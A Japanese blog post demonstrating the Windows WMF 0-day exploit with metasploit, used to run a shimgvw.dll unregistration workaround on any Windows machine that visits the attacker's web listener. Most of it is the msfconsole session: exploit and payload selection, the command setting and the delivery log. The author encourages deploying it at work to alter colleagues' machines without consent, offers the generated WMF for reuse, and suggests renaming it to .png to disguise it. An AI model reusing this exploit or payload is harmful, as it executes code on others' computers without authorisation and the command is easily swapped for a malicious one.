Windows WMF 0-day Exploit を実演 (2)

Windows WMF 0-day Exploit の脆弱性を実演してみよう。バージョン2。
バージョン1は、こちら。 → Windows WMF 0-day Exploit を実演 (POOH.GR.JP)

metasploit を使って、WEB アクセスしに来た Windows に勝手にワークアラウンドを実施するもの。
ぜひ会社など設置して、ワークアラウンドを実施していない Windows を勝手に対策してしまおう。
元に戻す方法は「Infocon がイエローに! Windows WMF 0-day の危険性が高まる!!」を参考のこと。

ポイント:
 Exploit で使う HTTPPORT (8080) を FW で開けておく。
 Exploit で使うコマンドは、regsvr32.exe -u shimgvw.dll とする。 なんでかしらんが、%windir% とかの変数が使えねー。
IP アドレス:
 Windows 端末(攻撃される側)– 192.168.0.1
 Linux 端末(攻撃する側)– 192.168.0.10

絶対に悪用するなよ!

$ ./msfconsole <<-- metasploit の実行。
Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu)


 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


+ -- --=[ msfconsole v2.5 [113 exploits - 74 payloads]

msf > use ie_xp_pfv_metafile <<-- exploit の選択。
msf ie_xp_pfv_metafile > set PAYLOAD win32_exec <<-- payload の選択。
PAYLOAD -> win32_exec
msf ie_xp_pfv_metafile(win32_exec) > show options <<-- オプション一覧を表示。
CMD が required だが、空である。ここに好きなコマンドをセットする。

Exploit and Payload Options
===========================

  Exploit:    Name        Default    Description
  --------    --------    -------    ----------------------------
  optional    HTTPHOST    0.0.0.0    The local HTTP listener host
  required    HTTPPORT    8080       The local HTTP listener port

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------
  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    CMD                    The command string to execute

  Target: Automatic - Windows XP / Windows 2003 / Windows Vista

msf ie_xp_pfv_metafile(win32_exec) > set CMD "regsvr32.exe -u shimgvw.dll" <<-- CMD にワークアラウンドコマンドを設定。
CMD -> regsvr32.exe -u shimgvw.dll
msf ie_xp_pfv_metafile(win32_exec) > exploit <<-- exploit を実行。
[*] Waiting for connections to http://192.168.0.10:8080/
<<-- 待ち状態。脆弱性の有る端末から http://192.168.0.10:8080/ にアクセスしてみる。
[*] HTTP Client connected from 192.168.0.1:4534, redirecting...
[*] HTTP Client connected from 192.168.0.1:4535, sending 1464 bytes of payload...
[*] Client supports gzip-encoded HTTP responses, compressing the WMF payload...
msf ie_xp_pfv_metafile(win32_exec) > exit <<-- metasploit の終了。

この Exploit で作成した WMF が再利用できるように置いておきます。平和利用してください。
利用時は、拡張子を”.txt”から”.wmf”や、”.png”に変更するといいでしょう。
unreg-shimgvw_dll.txt

タイトルとURLをコピーしました